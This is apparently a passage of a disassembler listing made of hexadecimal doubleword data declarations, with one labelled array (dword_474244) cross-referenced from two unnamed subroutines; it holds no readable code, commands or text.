		dd 253352C8h, 79721181h, 17C88F60h, 0C2339B96h,	0AAA95FE7h
		dd 0B6AA20F3h, 0FD6E154h, 0D9C7531Eh, 0D2E81AA0h, 66F4B547h
		dd 0F37EEDCDh, 4B2CEFA9h, 62963AF6h, 0EC078433h, 95659C4Ch
		dd 1F3E6064h, 5B27D1F6h, 0E4A0E898h, 547DE1C9h,	0A5B7E258h
		dd 0F64C8D1Bh, 4E3C6F76h, 0D5D21E5Ch, 7705E793h, 3FD05A37h
		dd 823CF9CDh, 0AB13CE0Fh, 9879DD48h, 3895902Fh,	0E8FACEFEh
		dd 55CE5176h, 0CBFC07F2h, 0B8ED83CAh, 9CB43BB7h, 0F10A32A7h
		dd 0E66974B2h, 0C757503Eh, 28BB0289h, 8BC070FDh, 4AF6638Bh
		dd 5B3CB867h, 6BD877B6h, 90141C12h, 0A4458E1Bh,	814C460Ah
		dd 0E8B07DB5h, 2BD62EEh, 0AA762A9Ch, 0FAC7AF70h, 850C8F2Eh
		dd 0B6B2CEADh, 57A1D5DBh, 61FC4E80h, 0E43EE357h, 5F416E70h
		dd 0C082D9C2h, 0FDA7E29Fh, 1628680Bh, 85E3E7EEh, 79C619D0h
		dd 7D9BCF96h, 1AF5DA31h, 0E21C45E2h, 515E7249h,	0E0761F34h
		dd 0C74B5E1Dh, 2DFBF73h, 3657B149h, 0F9EB049Eh,	8B5702A1h
		dd 73A3FEAAh, 0C968CFB0h, 93E068A5h, 142D60EBh,	395343F0h
		dd 0FE2C010h, 0B16A2E07h, 86B3DA5Fh, 0F28BE2EDh, 9B26C3F1h
		dd 7AEF4AAAh, 0E572FA4Dh, 212EAFE2h, 0C76CBADCh, 0FAACE8FCh
		dd 103A4FEh, 0C8ED4477h, 607F3B9Fh, 0A157F7E3h,	0CB1CDD9Dh
		dd 0F29A7F40h, 4D1A832Eh, 121D9B8Ah, 32F34BE5h,	7282E7ABh
		dd 0B6B1CD3Dh, 9154C0F0h, 0D6A17BFEh, 5469469h,	0CBFEAA0Eh
		dd 0D8160289h, 3EA91CC4h, 0E6E2D56Ch, 0D1CEACD3h, 0EAFFD5EDh
		dd 0BFC5DD21h, 0EE0BB9F7h, 0FA2989EFh, 9570077Dh, 509E6B5Fh
		dd 24A039A7h, 0ADC20F1Ah, 0C1EDA9DDh, 0AA85FBEFh, 0E31B5636h
		dd 0D3F757F7h, 48A76C54h, 48B91C51h, 0E2EF2BD8h, 41F7A876h
		dd 35269BB4h, 11BC8A11h, 285F6C21h, 0FE0A3A21h,	0D012D677h
		dd 71FBDDEDh, 0C4C13F71h, 0A0F2C715h, 0D4347F8Fh, 0C1B362BDh
		dd 80ACED2Dh, 8A82E9B6h, 0CDE5948Fh, 3C7C3C53h,	0BDDB6830h
		dd 0C18C8443h, 460212BFh
		dd 113DAE9Eh, 0D174A71Ah, 0CE3F5546h, 0D74A244h, 0D4253B9Ah
		dd 9AAE6E62h, 14FB53BFh, 3B63B551h, 1B689488h, 0F54EB6E6h
		dd 0DE25851Ch, 66FC9579h, 52780C6Ah, 9EAC7A49h,	536199CCh
		dd 7F873F06h, 6C0BE041h, 9662F896h, 7BB58D56h, 7BD329B2h
		dd 8E3BB010h, 5EBB5084h, 0D4F2A043h, 0F5D64083h, 66543451h
		dd 0FCF63AB3h, 58052D15h, 7A1F52B7h, 6F40DB04h,	6828DD4h
		dd 0BA680BEh, 6C0AEB08h, 0D9D8524Ah, 2E9FA101h,	0C9635262h
		dd 126446FFh, 7867BF29h, 0A9ECA476h, 391204BBh,	7E152B9Eh
		dd 0C3E8F760h, 58E68B7Ch, 38115F90h, 0FF83A03Ah, 0D79EC951h
		dd 0A1C1EDF4h, 0AC63FC2Fh, 140DE4ACh, 0FB98FEFEh, 66F87960h
		dd 371B1E6Bh, 1EC9934Ah, 0E2E8BFCFh, 0EB9C279h,	0C5D4CFEh
		dd 0A56D73DEh, 55ED37D8h, 5C1693E1h, 659417C9h,	0DAFC1CEAh
		dd 0EE5CBDEEh, 739917B9h, 0A2F63F19h, 6BFB8D9Fh, 0FABB730Bh
		dd 23C50177h, 0D5A1D569h, 54DA9FAFh, 994E05F9h,	0C1E49135h
		dd 43841706h, 0FB5F812Ch, 0EEE2F867h, 969758ECh, 0ED9535D0h
		dd 0BF092335h, 0F1AE0246h, 0D5CC22E0h, 5C6DB9F4h, 5EA2C413h
		dd 9AD4615Ah, 0D6E5617Dh, 0ECCA0395h, 54AAB1FDh, 0B5DFA7FFh
		dd 557C6A54h, 0F0FF3EE0h, 2CC0E6C3h, 92DA75F0h,	966EF3B3h
		dd 0C36342DCh, 4747EEB2h, 0BA7F68BFh, 0EE1DD3F0h, 0ADB55B99h
		dd 7C0D490h, 0D5D28ACFh, 2874FA1Ah, 78BAAFFh, 0DDC98BE8h
		dd 1226E862h, 0B6A5D2BFh, 0C41C264h, 0A2F5B890h, 4BD51A95h
		dd 4346CAC5h, 67EA94AAh, 0C4C49C1Dh, 0B11577F6h, 41AD6B2Fh
		dd 0B9DDCB5Ch, 1AA83A20h, 0A95ECCD1h, 9D97D417h, 0E28D5005h
		dd 0D1A1894Bh, 70F3E58h, 5C9B9555h, 0F0B2AD85h,	2EEC82Eh
		dd 0BEBF9D3h, 379CDE77h, 0CA5FE079h, 0CCC48E6Eh, 455FE35Eh
		dd 0C9AB8C0Bh, 9E685B5Ah, 7813B8B8h, 0AF191A1Dh, 5D388F67h
		dd 8822EC0h, 3DB23C35h,	59B69A9Ch, 0FC4A6ABh, 60EBEE4Dh
		dd 4282F223h, 7EDFD335h, 4BB67BCDh, 36A4C29Ah, 0C14C7860h
		dd 3B160318h, 38F5F8EAh, 2F7C7A01h, 375AA339h, 96499148h
		dd 0D1511F8Eh, 3DAAC1D2h, 29BCC471h, 6A39F619h,	0E5C5F6A5h
		dd 0B73B956Ch, 0AB18D420h, 0B941A6C9h, 36A04DDCh, 9BEB315Ch
		dd 39CFB2D5h, 0A8A646B0h, 8BE14548h, 0C2C155A1h, 3C18FD0Dh
		dd 0B2D130CBh, 0F72505C4h, 30CD94B1h, 57F1A0E3h, 17E6B881h
		dd 7F2090FCh, 0E1C6AE45h, 168BB36Fh, 977F6FAAh,	4447579Bh
		dd 9050198Fh, 37F12268h, 0B87AE68Bh, 0A52C9EA7h, 6AD6DAB6h
		dd 8B33B704h, 0F1E225CCh, 9B4E69E0h, 0DAF90B3Dh, 4DFF029h
		dd 3ED3F81Fh, 63D5DB0Eh, 10E16707h, 6C46B2FAh, 5F514115h
		dd 8CB7C97Bh, 0E31AA093h, 0A43CFB95h, 1509AC4h,	123649C2h
		dd 0D985D2BBh, 92A9D764h, 11CBA381h, 0B345DED5h, 16F984C7h
		dd 0A8C20CDCh, 933ADCBAh, 8EFDE984h, 85F1F6EDh,	0B00C3B5Eh
		dd 1D0C160Dh, 61336FABh, 9EA8B0DDh, 0EB530A2Eh,	2FF51E53h
		dd 0FDEEB448h, 9D5E4843h, 99737E6Eh, 31BAD17Fh,	2D9FC030h
		dd 0EEB717A9h, 0BB7C86D1h, 8E46B678h, 0E68495ADh, 52A0CCD2h
		dd 9D769DA7h, 8F6D59EEh, 23765587h, 44AC8F65h, 89EBAA89h
		dd 557B2099h, 0E65FDCFFh, 97654128h, 7BEE2BBh, 0F6364223h
		dd 6CCE97F7h, 55F3B8ECh, 5CCA7BEEh, 0B569A52Ah,	0AF53A94Ah
		dd 0A5F2600Ah, 3E205602h, 385A9E0Fh, 73100BBAh,	15778365h
		dd 5ACED3F6h, 358998E9h, 1D82C981h, 0AA9882FBh,	0DA4692EAh
		dd 0C5C4B4Bh, 7922EF9Fh, 0F3819C7Ch, 0FEE8C622h, 3DF5B0DAh
		dd 0BF647AF4h, 19E719EDh, 14303913h, 5F55A34h, 1253FF7Ch
		dd 86F29BD3h, 77C7D106h, 4EF8BA30h, 8655F277h, 20C35343h
		dd 846B9150h, 6EAFE8D4h, 7A8D2878h, 0C7E77258h,	0F9A04793h
		dd 2FC399C0h, 0DF4A93DFh, 0EB79AD4Ah, 18C6BA17h, 0E57E1CFBh
		dd 0EC42E150h, 0EF3FE73Dh, 0B9A814BAh, 2B14B60Ch, 24648E26h
		dd 278B81ACh, 0E0BB9771h, 0C826E52Dh, 26274BBFh, 0FBA30ABFh
		dd 0FD29F7D1h, 0E58AD23Eh, 71925652h, 39B398E6h, 19D9E276h
		dd 66A17B25h, 0E3A11AA5h, 2F3DF83Ch, 69B93A1Ch,	7CD074A6h
		dd 527B1564h, 693C3E5Ch, 89B21029h, 7F6A405Bh, 3E5B4C0h
		dd 0AAA2D936h, 69303780h, 5DEFB235h, 0CB87CAEBh, 8F9F3B87h
		dd 0EE5BE2B8h, 0E4CC648Ch, 4EB7D104h, 0E1249434h, 0DA217172h
		dd 25179F25h, 64D61C5Ah, 0E25A3440h, 0B2FF921Bh, 95C43AA8h
		dd 88B47E55h, 0AEA0548Dh, 4AFAB312h, 22F73A55h,	0C21508EBh
		dd 15F6322Dh, 5069E566h, 3276473Fh, 4AFE9F58h, 0ADA0360Ch
		dd 98C93A0Fh, 0C6134F6Dh, 0A869D775h, 0BC499D11h, 8C6A3CEFh
		dd 0AC649FECh, 539FD1E6h, 979CA2EAh, 0BED3689Ch, 0E055F740h
		dd 0DDB8D1Ah, 0EF02762Fh, 2418FF83h, 9ABBF77Ah,	0EA7B7BBFh
		dd 0F3D02EB2h, 97075C6Ah, 0C0F91504h, 0CDC48F06h, 0EEC0E37Dh
		dd 0C131B95Dh, 0E8D7A5FFh, 0C16422B8h, 8604EB9Ah, 0A5B36ECEh
		dd 0E33BEF80h, 0A49B8923h, 0CA2FA3B5h, 683EABB1h, 3DA686EBh
		dd 0D31DC3A3h, 52C49592h, 0F11960E4h, 76B6AB43h, 3571C93h
		dd 0A62C3FADh, 653DAEEFh, 15AB0327h, 165F90FCh,	81C39AFFh
		dd 607C042Ch, 671F068Fh, 3E8D5BE8h, 0D672C014h,	0E6029396h
		dd 0DA455AAFh, 1B31613Ch, 6D1F855Ah, 223699FDh,	4CF2792Ch
		dd 307C0BBCh, 107011EBh, 8FC5417Ah, 4D541414h, 0DE81AA04h
		dd 4544066Eh, 31A5A112h, 0AB855D2h, 0B706DA2Fh,	0BEBCCF45h
		dd 7350E8B3h, 8E1DC445h, 0F8C86E0Fh, 0C7279958h, 250AFF56h
		dd 55D314FAh, 0DAD28EA0h, 7F57D30h, 848FD839h, 0D892AFA8h
		dd 2F8131DDh, 281B35C3h, 7E0CE4EFh, 8487EF89h, 3676C7EDh
		dd 53183E1Dh, 0D13FFBC3h, 0E294C7F3h, 951ABF5Eh, 6CD1C56Ch
		dd 6FB120ACh, 46D7A2Ch,	0C56285E7h, 6D97DB8Ch, 439DAADCh
		dd 0B78346EAh, 0B16A3989h, 798140F1h, 0FD09882Ah, 3E888BA9h
		dd 0C6B4477Ah, 0D8154B6Fh, 0B3C45AB0h, 0ABE1EF83h, 0A8CB6A1Bh
		dd 0D5EAD0F8h, 13F5AF24h, 3285743Fh, 2865C408h,	0CD7F25A8h
		dd 0B5118FE3h, 6265C1BBh, 0C7C6A4DBh, 0E6A3608Bh, 67CB607Eh
		dd 1B48FC85h, 678633A2h, 1C9C8FEDh, 8574D75Ah, 5249B557h
		dd 0EB2512C2h, 5113B00Ah, 0D7448EF3h, 1B57B851h, 1DCD06E1h
		dd 68CEDA11h, 0F650A2A3h, 38377124h, 0D1468953h, 3EFB9EC8h
		dd 134EDB37h, 0B962F0E5h, 9C0A3F45h, 2BC9733h, 27EB3567h
		dd 6E2B0D6Ah, 376C0499h, 84A38086h, 98B9EDA8h, 0DCAC33A3h
		dd 0F6E6F581h, 6F86AF31h, 99816927h, 6525FA9Ah,	0EF4D55FBh
		dd 0FA42DAB8h, 58427946h, 68C2B130h, 3DD2F639h,	7695D455h
		dd 0EB93096Eh, 83E445CCh, 0E96A176Bh, 0BDEAFBC7h, 6F9B32E0h
		dd 4A72A783h, 3BBEB6FAh, 77A3B21Dh, 9A5F607Fh, 84C7BCB8h
		dd 17F56CB2h, 0E8739708h, 0D51ABBEAh, 7D5018EFh, 4DE25CFAh
		dd 0FD8CCE0h, 74966657h, 498D24CDh, 93CE8E41h, 0B704ED57h
		dd 740137CBh, 0EA6AFB97h, 99A06FF7h, 0AFB9A169h, 81187E7Fh
		dd 202F84Ah, 77079647h,	5274B6EAh, 0F9738F08h, 61B136A3h
		dd 502A83FFh, 481FAB76h, 85156D3Fh, 0D074EDD1h,	3BAD6044h
		dd 0EACFF712h, 0ECAFBA4Eh, 0F2C7AD83h, 4EA0C829h, 0EADA35B1h
		dd 17C7A212h, 0F19482B7h, 0AACDAFBBh, 0F82652A5h, 6BB9434Bh
		dd 0AD305A42h, 7E24BA65h, 2B1E9C23h, 5BF1DC2Bh,	7A305526h
		dd 8C051FB4h, 4C0FF53Dh, 0DDA45C97h, 52083EFBh,	4B231F5Fh
		dd 0A7027EB7h, 0A456EE65h
		dd 9B8DCCD9h, 811D0809h, 41508CF2h, 0A3D85E6Ah,	8B03C1D3h
		dd 0B58BC174h, 0A972CCFBh, 670F7FC8h, 7D109533h, 41DA72A7h
		dd 0CAE75988h, 0DAB6B12Ah, 76A7CDE4h, 0B810E9D4h, 0F87E6AA5h
		dd 0E25E76BDh, 0BF5A1E63h, 167479AEh, 9E8D26F0h, 35475983h
		dd 53B765A3h, 0CE3B69E3h, 4AE4916Ch, 9C45DFF8h,	49DA1639h
		dd 1D15A270h, 2AF6AD3Eh, 0F89E5181h, 24EE8E64h,	93C0F5D1h
		dd 0C485CB20h, 0C6425D95h, 0CECCD3DFh, 0B5DF37FAh, 0BAF0DC60h
		dd 6C4BB040h, 4ED5960Ah, 0DCF2E91Bh, 6D5E8225h,	0C7794C4Eh
		dd 3D34F09h, 0DDD54083h, 0DDDE04A6h, 9CF7219Bh,	0DD2991AAh
		dd 16D4A14h, 0BCF3718Fh, 0F4427F80h, 35DA40D5h,	52C13FDEh
		dd 0AA0136B7h, 2D166E5h, 5FE15F65h, 8069DCFCh, 0AB510EBDh
		dd 0E7EF67Ah, 0DDC57F8Fh, 842B5BF6h, 76C065D4h,	786F0143h
		dd 43722C0Ch, 0BD980EECh, 0E04EA43Eh, 979F5EC7h, 21F1CC25h
		dd 0B5C53BD0h, 2FFE99D5h, 5FC5FE58h, 4A6DCF86h,	0DB8F40BFh
		dd 0E520091h, 646F4733h, 22FAB299h, 5F0BAA6Eh, 0CA5D846h
		dd 7A142250h, 0B06940E7h, 17D4B7F9h, 474BF3C7h,	0FA4D72CBh
		dd 0A3E5AAE7h, 6260A08Bh, 4DF501EEh, 0DFEDCEB4h, 0A855AEF0h
		dd 0A1307425h, 90F34862h, 0B6DBE5D6h, 325FC7E8h, 0F3B93AFEh
		dd 0CB47EC5h
dword_474244	dd 354CAA59h, 0E5F8622Dh, 0E4794BA5h, 0F73B8229h, 1DB3238Fh
					; DATA XREF: sub_45454E-8A7Co
					; sub_451854+637Ao
		dd 0DBE36BEDh, 0A917F92Ch, 23FDA97Bh, 0F6C77D65h, 4DDE5FA8h
		dd 63819261h, 0D9ABEB04h, 6BD4BA84h, 0B060E17Bh, 406DF078h
		dd 5D0D21EEh, 0FC741F5Eh, 0C1177BE6h, 6D53CBFEh, 0B5E2816Eh
		dd 297E365h, 2E4E624Ah,	7B841B9Ch, 62AB5F83h, 0E17DD13Bh
		dd 0D1CCF7C5h, 16960462h, 729CCAAEh, 0BAAF8EEFh, 0E3C24C45h
		dd 3ABC524h, 0EDDE843Fh, 0B68E8ABh, 0E4D7A5E6h,	0FE718738h
		dd 27E35D12h, 46FF32C8h, 609BA544h, 0EC16A72h, 9EC95ED8h
		dd 2AA38BD3h, 0B455EA87h, 0F8B52317h, 6BC96B54h, 32D6DC8h
		dd 0BEC103EDh, 0E9D45B1Ch, 510A6925h, 1B4E5F72h, 499B6285h
		dd 3BFB79B9h, 8EB8B419h, 0DAB581ADh, 0FF62EDF1h, 305C4574h
		dd 0A74DF287h, 48B07B7Ah, 8B49E8ABh, 796E7E56h,	49FD0AF9h
		dd 0B3C3B712h, 28562A0Ch, 9B35625Ah, 515D2C62h,	0E9E6F703h
		dd 0E9F46544h, 6341D07h, 8BA7FEB0h, 82F577C6h, 6492B4A8h
		dd 3C05AB17h, 9AB54226h, 0AD69FD11h, 0C5595955h, 65558EE8h
		dd 47EF7456h, 72C618ABh, 0BA7392A9h, 0FADD7C9h,	0BC047507h
		dd 8D44A21Bh, 2A9CFAFDh, 5DB9A0BDh, 0F6EDF9A9h,	535FC73Ah
		dd 0DBA3E948h, 0D32C9639h, 7950D5D1h, 0BFB9173h, 0CEDA96DDh
		dd 23E2A1D7h, 5722D8B4h, 0FA63AADAh, 95506D48h,	0F962D671h
		dd 0D446C99h, 0CE2E8A87h, 0A33995A8h, 0ADF4F754h, 2FD01EEBh
		dd 0E150866Ah, 381132B6h, 4E18754Eh, 754A79B0h,	0CF66B451h
		dd 82330337h, 446DA509h, 245A81AFh, 35CFFC7Ah, 0E7BFA9F7h
		dd 8C72E8F7h, 6C895061h, 0E39E21F8h, 0A278D0F5h, 0B6F2CECEh
		dd 3F28D764h, 0ACB4C170h, 0A11D4F9Ch, 0BF89FCFh, 0FD359DD1h
		dd 0E2DF011h, 739FD4BFh, 0C9F8FCCFh, 0E68D171Ah, 3C98575Bh
		dd 0AC4DF6B0h, 0EB5A86DAh, 3EFC6143h, 0EE429DDBh, 0F43F17DEh
		dd 57E750CFh, 0ECD7195Dh, 3E735684h, 0C0FEBDEEh, 927C17D1h
		dd 0B7F4ADD6h, 37F5204Dh, 1AD1D63Dh, 0AC1C0CE5h, 0BA958E82h
		dd 8888D77Fh, 86E0473Bh, 0D81FB1C9h, 2BBFF263h,	0FAC15E6Eh
		dd 79A8BF17h, 77CDA65Eh, 0B63A28C2h, 7F87E860h,	0D99F3C59h
		dd 2F6CAB27h, 126A0567h, 5FBF2CF4h, 0B45BE38h, 33440637h
		dd 805DFEAFh, 4057A9B9h, 48AEEBC4h, 0CB9E4921h,	0BB00AB03h
		dd 0E2056CE3h, 46C895D0h, 20EA434Fh, 57BF469Bh,	444D5ABh
		dd 0F38BBF0Eh, 53436EF8h, 57CB47E2h, 0F30CF8E7h, 0BCD5A30Fh
		dd 418B98E6h, 75ED415Dh, 3A5F01FCh, 0DC9F6F9h, 6944DCE5h
		dd 4DF1AE41h, 690ADAE1h, 9E0BAB05h, 4F86ADEFh, 0A334ACBAh
		dd 3A8870AAh, 5857A13Eh, 0EF834AE7h, 0E381888Eh, 0A0C2FEBh
		dd 0C82FACD2h, 981A04B5h, 5439FC2Ch, 0FD400F59h, 0D02A97D2h
		dd 465285EDh, 0FCAB39CBh, 7B7E590Fh, 0D1044ADFh, 43B52660h
		dd 0FA3D5146h, 161E4ED9h, 6C0A322Bh, 0BC888AEEh, 0B8A35EDBh
		dd 5F16B5D7h, 91AB35Bh,	5F7158F5h, 0CAAA23B5h, 4BF8C274h
		dd 0C45B0D0h, 41444ACEh, 0B470B55Fh, 8829C511h,	0FDFAA1CAh
		dd 2C2125C9h, 0B4B53C1Eh, 0C7F3FE07h, 0B9EA1AEBh, 5153BF54h
		dd 0E632FBB7h, 3A31B447h, 99C217F4h, 54E55DB5h,	481F3BC2h
		dd 669EF46Bh, 0A20BDFB1h, 0A824ECF4h, 1B13E0EDh, 42D1511Fh
		dd 0B5B094Bh, 50B22A55h, 0C4B5E5A3h, 8DE08221h,	7EF8A37Fh
		dd 0CA95D2DEh, 65DB3E28h, 2B52267Ah, 0E813BA5Ah, 387EBA5Dh
		dd 0B4596998h, 0D0F33F67h, 2E267EE1h, 11CBF37Dh, 0F2CF075Bh
		dd 44B956C9h, 7D3BD72h,	5C32BBEh, 8DC91C5Fh, 1DB96B85h
		dd 925539Eh, 0A782D5EEh, 0D5F4C63Bh, 136881F5h,	0F968E467h
		dd 6826FBA5h, 717CB093h, 0CF46EDEBh, 0D4CCAAD2h, 756D72D7h
		dd 0C2AC2CA2h, 5929540Fh, 684528DAh, 0AA35FF99h, 7F7D4A42h
		dd 55F3A00Ah, 10C2B850h, 34CF582Dh, 398B740Ah, 32A2AE06h
		dd 3CCF0AFEh, 0A7FF8729h, 240227Fh, 0BDFD2C5Dh,	0D459BAC5h
		dd 251FF7D3h, 755EA8F8h, 0F8FD4C1Fh, 7E623A1Dh,	0F28C3FDBh
		dd 79E48F07h, 94BBE242h, 57B6F68Eh, 1F4D1D1Ah, 0B648CCFCh
		dd 2D9C60FBh, 7ED2EFCAh, 0D398D260h, 8DC84B05h,	0EBA45F8Dh
		dd 332AE9B6h, 5F176B60h, 0DB4525A5h, 27E8FE01h,	6BFADBF7h
		dd 33A3D7A0h, 785F0042h, 1ACEFC60h, 4D6C2905h, 40A91337h
		dd 7E376D5Eh, 133E1F28h, 1677A934h, 0EB484AD8h,	82D15181h
		dd 7AF9EA78h, 0F13F35C5h, 0B3F8CDC1h, 0BDAA0F78h, 86B0F34Ch
		dd 3F13ED50h, 0D9D7181Fh, 50D4EFE8h, 0B3C5E636h, 0D54D87E1h
		dd 1512C3E1h, 79359537h, 0BAE52EAAh, 95FCA248h,	2BE63A74h
		dd 0EBD5C6A5h, 3F5C8D7Eh, 0F8A9ED18h, 0FE4A4FDCh, 16D64457h
		dd 0BEC54C98h, 375B2F38h, 0FAD7A3DFh, 1BF0B90Ch, 0B313EBA5h
		dd 0F898E4AAh, 917079F3h, 822352EBh, 91D118D2h,	835B21A5h
		dd 3FDB15C2h, 159C45BEh, 0CDFF275Eh, 6038551Dh,	0B9A312A3h
		dd 7D5BBEDFh, 0D23C8360h, 749D08B7h, 25FC5FE5h,	0D139C57Fh
		dd 17B844ECh, 0B0AA437Bh, 0B4BA4D0Bh, 3409DDADh, 27DBC3F0h
		dd 0BE586BDEh, 4547ABE1h, 0ED1B8317h, 43BEA954h, 4A67FA4Dh
		dd 0A2AAA9E1h, 62CB6A7Ah, 852F42E7h, 0B6B732B5h, 0CDD48B35h
		dd 0C0C41B10h, 64CBFA37h, 1728C094h, 4D514DBBh,	9BBBB453h
		dd 0CFF43CF4h, 514BCFE4h, 0A95AD3E9h, 4C86F123h, 5A3934B4h
		dd 0EAA74D74h, 0DA8974CBh, 0DF89AD9Ch, 0CC5E6D41h, 4527F1BFh
		dd 0AF658ABFh, 0F1C1C1E3h, 485FD105h, 0A36A2574h, 7A3FCBEEh
		dd 464C6D14h, 0E4AB1ECAh, 98ACE816h, 0E0FCB03h,	0E0BCA76Dh
		dd 9CD89E34h, 1097EA37h, 9A59665Ah, 6A6EFAEFh, 0C98EA0E4h
		dd 0F9025C6Ch, 0D9562CD7h, 0CDA888B7h, 2F902552h, 0A4FB1A66h
		dd 8E0C8DCAh, 8AEE5C3Ch, 7AD153E9h, 42A0C90Dh, 0AD4EBD6Dh
		dd 0B36399BAh, 0F633554Ah, 0AF7D3704h, 703365B1h, 0F3E29C17h
		dd 2FB67015h, 3D08A1F8h, 63448555h, 8477AE82h, 769943A4h
		dd 0A189181Dh, 0E977456Ah, 0B2337D3Fh, 3A577C52h, 8CCBB87Eh
		dd 0CF033806h, 3B97C314h, 6FF57DFEh, 89CD305Ah,	8344AAC0h
		dd 4F34E8BFh, 45994DBDh, 0D4966A63h, 0F26AC555h, 0BEE02D19h
		dd 348268B6h, 7C1E661Fh, 9E38DAEBh, 0C1571B56h,	3CE566AAh
		dd 391555F0h, 5129CF33h, 1A112643h, 71CF3EC2h, 6D7DBDFCh
		dd 0CA6D8C7Ah, 0EBB4CA3Eh, 0B2CA6837h, 9B67FD97h, 3E542C56h
		dd 0D2884AA1h, 0B32B71B7h, 509A7E03h, 9560755Ah, 6470F02Fh
		dd 79CA45A8h, 0B4B3FBAh, 1C89D614h, 7989D51Ah, 887539Fh
		dd 3ACD394Ah, 0E193FDD3h, 0CA3942D1h, 0FE3751F3h, 0E07DDFC7h
		dd 0F020AFEFh, 234063C1h, 625C4AA4h, 0CFE05F9Fh, 0DE0BCBB4h
		dd 28A4D065h, 0FA08B4AEh, 0BA075AF8h, 0B6B23C0Fh, 34BE1F7Ah
		dd 12DB2589h, 185DA29Bh, 76BB67ADh, 0A329D546h,	5A7581B8h
		dd 116E3DD5h, 2E33A5F9h, 761E3FDFh, 70A107ADh, 55447024h
		dd 0F49E9D5Ch, 0ED106260h, 0F37E1BC0h, 2D0CE3AFh, 45DE3FE5h
		dd 926D7D8Eh, 0F99F0382h, 0B3BF76FBh, 0E8BA5041h, 0A86EB015h
		dd 2F9272C5h, 0EA3BF9E6h, 7060CD0Dh, 0D55FA666h, 0B00BFBA8h
		dd 0B5778879h, 407925E2h, 95C954F3h, 0FBDCFAF9h, 0C5B10B51h
		dd 21B44B27h, 63CF8ABBh, 0FF51F11Ah, 0BA94718Eh, 1029B5B8h
		dd 5A5F71D9h, 0D363C2B4h, 2EB5C3B6h, 0F56F543Bh, 0F2551FA7h
		dd 87E236C2h, 5DDD33Ch,	11EA34F7h, 0E89A1BA7h, 7C943C29h
		dd 88E6CDD8h, 6C5F4AFFh, 0D7AB060Bh, 4EF7B331h,	6BBA9BC9h
		dd 0AFDA6CAAh, 0DBE90AD9h
		dd 0C4F99946h, 3CE99768h, 0BBFCD6F0h, 0ECF7D792h, 0E2A92FE6h
		dd 50F688BAh, 0C8DECD5h, 0F87A41FBh, 0F29B9CEEh, 0C67B3EBBh
		dd 0C046E770h, 0E7B7345Fh, 0E4C9EDD9h, 0F0F59139h, 7FBAB94Bh
		dd 0B84BC327h, 5548BED6h, 88BF630Fh, 7DD6F3FAh,	0A75C5406h
		dd 84C590F5h, 7C2D9562h, 0B37F463h, 2898F63Ah, 0F418F2DAh
		dd 50F4FDEh, 5CFD6DFEh,	0B8FAC855h, 46924A97h, 1C0B385Eh
		dd 0AAD5E7DCh, 0AA28A07Dh, 0D14F6EB0h, 0C4D827B6h, 0E0C8D12Ch
		dd 6C969F1Ah, 0D46E4DD5h, 0BAC5C7C7h, 898C3DFEh, 17AB4FEDh
		dd 0B8440F84h, 0DD4004ADh, 0E5D55E63h, 4560C5CCh, 0DA5FF6FBh
		dd 0CDEA46AEh, 315AC8ECh, 5FDF5486h, 0FE26680Ah, 974A992Ah
		dd 28D88AFBh, 2FA07166h, 0B4D03E1Ch, 80D1AF76h,	252B542h
		dd 0CB5B9427h, 17E17B06h, 0E8C441B7h, 52EB52A0h, 0CF21DD17h
		dd 0A359930Dh, 0E1E5EE3Fh, 643FE7A6h, 2A8A1016h, 197BD33Dh
		dd 0F2D2384Bh, 0EEDDDC47h, 0ED5FCA30h, 0AF73B1A3h, 665AB880h
		dd 598670A3h, 78C527B0h, 0ABA8B1F0h, 0E6F25925h, 0D9485641h
		dd 6FE91BA3h, 96D7B2BAh, 0E260005Bh, 400985AEh,	3761D2F5h
		dd 82066EF7h, 0F5FECAB7h, 0A8B5A55h, 0FD06894Ch, 0CDD8414Eh
		dd 45718BC1h, 0B6D6619Dh, 0DF57DDA5h, 5F36D330h, 57F22613h
		dd 0AEA47A6Ah, 0FBD50148h, 0DF04156Ch, 0DF81F274h, 251A1ED2h
		dd 0DFA0F168h, 0BCD4CE27h, 1C1F6791h, 2F43EBEAh, 8856BEDh
		dd 0FE4828ABh, 3A35AF8Dh, 0B6F6FE26h, 0A2075A9Eh, 965FD2E7h
		dd 74BC60B1h, 0B3CC146Ah, 8BFCF7ABh, 5A1698EEh,	929EA7F0h
		dd 766212D1h, 980E37FBh, 19D05879h, 6CB0C3FBh, 0A4C28D90h
		dd 2DA3FDBh, 492D3DEFh,	0E1C6B7E8h, 40CBB215h, 575DACA9h
		dd 0D9B9FA2Dh, 0EC153814h, 3C0D694Ah, 0E5DD1C5Fh, 0F150650Bh
		dd 0F7FA14B6h, 19C9C7E8h, 97CB742Dh, 6A2110B3h,	92A0B803h
		dd 97CD205Bh, 8EEE2975h, 0AA304BAEh, 0B3AE5B14h, 7F65DB3Bh
		dd 570B7333h, 1383F39Bh, 576D9AC6h, 0FF4E382h, 96C61A3Ah
		dd 0FC1FB828h, 382F48FDh, 2FA2043Bh, 9BBA99FCh,	0FAC72D0Dh
		dd 0AEC57C27h, 83FB3912h, 0BA6D6161h, 0AB883A1Bh, 2ABD1ED1h
		dd 32446460h, 2C950253h, 3BD1FA6Ah, 44328A2Ch, 1A67B58Fh
		dd 0E838F50Dh, 52ED6292h, 0B5205695h, 0CD7EA55Bh, 0E13EC2Ch
		dd 0E4FCF64Dh, 0AF92F8BBh, 0CC84A320h, 0CA8D09F5h, 8137C7BAh
		dd 75AD9A35h, 0ABAEA8B6h, 1B7D10B9h, 2F95DF57h,	0B8D979F1h
		dd 3EB31633h, 43EF49D2h, 9FCD3559h, 4BF3D1C5h, 5D055CBBh
		dd 0AAC73133h, 34FA9274h, 37954971h, 7575937Dh,	0E5FA93Fh
		dd 0CEAA39B9h, 0F3410F2Ah, 19579256h, 1DA30FC6h, 19E697Bh
		dd 6D898611h, 80B92DA4h, 36DB6229h, 2BF821ECh, 3A155F09h
		dd 0C36FBE8Ah, 0D8E85065h, 7238B83Ch, 9A9B10CFh, 17E01F0Dh
		dd 36B867FBh, 74E1E5EBh, 4BF8E0FAh, 6377616Ch, 0E1ADE817h
		dd 832739D0h, 8C0FB499h, 47C64913h, 0D61E4F3Ch,	15D0AB0Ah
		dd 1543A84Eh, 2E02A363h, 0F4AD2B11h, 42CB98CBh,	0B39C798Ch
		dd 0A469F82Fh, 41B31916h, 0A381FE41h, 0CC4701B9h, 5F1FA604h
		dd 0F713B64h, 0E53AEACCh, 0A55EE29Ah, 0EEFDAB66h, 320BD197h
		dd 0B5D715D6h, 9E2C7F66h, 0F5113C6Ah, 10B48C0Dh, 683C52A3h
